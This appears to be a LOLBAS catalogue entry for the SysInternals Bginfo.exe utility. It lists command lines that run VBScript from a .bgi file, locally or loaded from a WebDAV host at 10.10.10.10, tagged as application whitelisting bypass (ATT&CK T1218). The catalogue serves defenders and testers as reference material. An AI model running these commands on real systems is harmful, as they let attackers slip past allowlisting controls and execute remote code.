.. /Bginfo.exe
Star

Execute (WSH)
AWL bypass (WSH)

Background Information Utility included with SysInternals Suite


Paths:

Resources:
Acknowledgements:

Detection:

Execute

  1. Execute VBscript code that is referenced within the bginfo.bgi file.

    bginfo.exe bginfo.bgi /popup /nolicprompt
    Use case
    Local execution of VBScript
    Privileges required
    User
    Operating systems
    Windows
    ATT&CK® technique
    T1218
    Tags
    Execute: WSH
    This LOLBAS executes scripts in Windows Script Host (WSH) languages, such as VBScript and JScript.

  2. Execute bginfo.exe from a WebDAV server.

    \\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt
    Use case
    Remote execution of VBScript
    Privileges required
    User
    Operating systems
    Windows
    ATT&CK® technique
    T1218
    Tags
    Execute: WSH
    This LOLBAS executes scripts in Windows Script Host (WSH) languages, such as VBScript and JScript.

  3. This style of execution may not longer work due to patch.

    \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
    Use case
    Remote execution of VBScript
    Privileges required
    User
    Operating systems
    Windows
    ATT&CK® technique
    T1218
    Tags
    Execute: WSH
    This LOLBAS executes scripts in Windows Script Host (WSH) languages, such as VBScript and JScript.

AWL bypass

  1. Execute VBscript code that is referenced within the bginfo.bgi file.

    bginfo.exe bginfo.bgi /popup /nolicprompt
    Use case
    Local execution of VBScript
    Privileges required
    User
    Operating systems
    Windows
    ATT&CK® technique
    T1218
    Tags
    Execute: WSH
    This LOLBAS executes scripts in Windows Script Host (WSH) languages, such as VBScript and JScript.

  2. Execute bginfo.exe from a WebDAV server.

    \\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt
    Use case
    Remote execution of VBScript
    Privileges required
    User
    Operating systems
    Windows
    ATT&CK® technique
    T1218
    Tags
    Execute: WSH
    This LOLBAS executes scripts in Windows Script Host (WSH) languages, such as VBScript and JScript.

  3. This style of execution may not longer work due to patch.

    \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
    Use case
    Remote execution of VBScript
    Privileges required
    User
    Operating systems
    Windows
    ATT&CK® technique
    T1218
    Tags
    Execute: WSH
    This LOLBAS executes scripts in Windows Script Host (WSH) languages, such as VBScript and JScript.